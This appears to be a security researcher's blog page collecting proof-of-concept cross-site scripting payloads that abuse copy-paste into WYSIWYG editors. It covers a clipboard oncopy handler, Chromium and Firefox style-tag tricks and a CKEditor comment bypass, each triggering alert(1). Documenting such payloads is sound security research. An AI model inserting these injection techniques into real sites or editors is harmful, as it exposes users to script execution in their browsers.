WYSIWYG XSS Payloads

Post

https://research.securitum.com/the-curious-case-of-copy-paste/

Payloads

Clipboard basic

document.oncopy = event => {
  event.preventDefault();
  event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
}

Chromium

(start)
a<math>b<xss style=display:block>c<style>d<a title="</style><img src onerror=alert(1)>">e
(end)

Copy me=> (start) ab<xss style=display:block;>c

Firefox

(start)
<style>
@import''; 
@font-face { font-family: 'ab<\/style><img src onerror=alert(1)>'}
</style>
(end)

Copy me => (start)

(end)

CKEditor

(start)
A<!--{ce_protected}{C}%3C!%2D%2D%20comment%20%2D%2D%3E-->B
(end)

Copy me => (start) AB (end)

Security engineer, Developer and H4cker

Menu

Tags

Hacking Android Linux AWS Blogger Javascript Programming BurpSuite Design Docker Security Exploit Git Github Golang Metasploit BugBounty ZAProxy iOS Penetration Test PHP Ruby Windows Python Swift Jekyll Atom CSS Heroku VIM MacOS Crystal-Lang PostgreSQL SSL SQL Tools Cloud Diary Cullinan Phoenix